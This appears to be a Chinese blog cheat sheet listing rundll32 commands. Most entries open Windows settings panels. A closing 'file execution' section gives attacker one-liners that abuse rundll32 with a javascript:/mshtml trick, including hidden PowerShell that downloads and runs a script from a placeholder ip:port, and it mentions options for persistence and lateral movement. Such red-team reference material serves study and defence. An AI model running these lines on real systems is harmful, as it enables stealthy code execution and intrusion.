关于rundll32

一.常规的dll调用 C:\WINDOWS\System32\rundll32 advpack.dll #12 C:\Users\xinxin\Desktop\ConsoleApplication1.exe                    //执行exe     ps:rundll32 advpack.dll, #-4294967284 C:\Users\xinxin\Desktop\ConsoleApplication1.exe            rundll32 advpack.dll RegisterOCX C:\Users\xinxin\Desktop\ConsoleApplication1.exe C:\WINDOWS\System32\rundll32.exe devmgr.dll DeviceManager_Execute                    //设备管理 C:\WINDOWS\System32\rundll32.exe keymgr.dll,PRShowSaveWizardExW                        //忘记密码 C:\WINDOWS\System32\rundll32.exe keymgr.dll,KRShowKeyMgr                        //已经存储的用户名和密码 关于rundll32

 

 C:\WINDOWS\System32\rundll32.exe newdev.dll,DeviceInternetSettingUi                //设备安装设置

C:\WINDOWS\System32\rundll32.exe powrprof.dll,SetSuspendState                            //电脑休眠 C:\WINDOWS\System32\rundll32.exe Printui.dll,PrintUIEntry /?                                            //打印机用户界面 C:\WINDOWS\System32\rundll32.exe pwlauncher.dll,ShowPortableWorkspaceLauncherConfigurationUX                        //windows to go选项 C:\WINDOWS\System32\rundll32.exe shdocvw.dll,DoOrganizeFavDlg                                        //收藏夹 C:\WINDOWS\System32\rundll32.exe shwebsvc.dll AddNetPlaceRunDll                //添加网络位置向导 C:\WINDOWS\System32\rundll32.exe tcpmonui.dll,LocalAddPortUI                        //tcp,端口打印机添加 C:\WINDOWS\System32\rundll32.exe user32.dll,LockWorkStation                                            //锁屏 C:\WINDOWS\System32\rundll32.exe user32.dll,SwapMouseButton                                //鼠标左右键交换,很恶心 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255                                //清楚浏览器历史记录 关于rundll32

 

 

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351                                //删除所有浏览历史和加载项历史 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 2                                //删除 cookie 和网站数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16834                                //删除下载数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16                                //删除表单数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 32                                //删除浏览器密码 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 8                                //删除临时 Internet 文件和网站文件 C:\WINDOWS\System32\rundll32.exe sysdm.cpl,EditEnvironmentVariables                                        //环境变量 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL                    //控制面板 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL HotPlug.dll                    //删除硬件 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}                //文本服务和输入语言 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL joy.cpl                        //游戏控制器         PS:当然,我们也可以直接使用control joy.cpl直接打开         也可以使用vbs文件(双击&&wscript //e:jscript joy.vbs),js文件(wscript //e:jscript joy.js) 关于rundll32

 

 

也可以使用 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl                            //控制面板->用户账户 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL wscui.cpl                    //安全和维护 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL NetSetup.cpl                //配置无线路由器接入点 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl                            //浏览器属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl @1                        //键盘属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl                            //鼠标属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl                            //网络连接 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl                    //ODBC数据库管理 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1                //系统属性,更改计算机名 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL cscui.dll,,0                    //启用脱机文件 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL access.cpl            //轻松使用设置中心 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL srchadmin.dll            //索引选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl                        //启用平板的笔 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl                    //打开电源选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0                //声音设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0                            //程序和功能 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL firewall.cpl        //打开防火墙 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl            //打开系统显示 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl,,0                        //桌面图标设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0                    //区域,时间设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL C:\WINDOWS\System32\Speech\SpeechUX\sapi.cpl,,1                //语音文字转化 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 0                                //文件资源管理器 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 2                                //文件资源管理器选项 C:\WINDOWS\System32\rundll32.exe shell32.dll ShellAbout                                    //关于电脑本机 C:\WINDOWS\System32\rundll32.exe shell32.dll SHHelpShortcuts_RunDLL AddPrinter                //添加打印机 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder                    //字体 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect                    //映射网络驱动器 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder                //打印机列表 二.文件执行 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))")            //执行powershell rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true)                //执行我们的cpl文件 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("ConsoleApplication1.exe")+"\74/script)")                        //执行我们的exe文件 当然,还有我们的-localserver以及-sta参数可以让我们更方便的权限维持或者横向移动 关于rundll32

 

 

上一篇:Could not find resource


下一篇:DVWA将密码设为空后仍然无法连接的问题:Could not connect to the MySQL service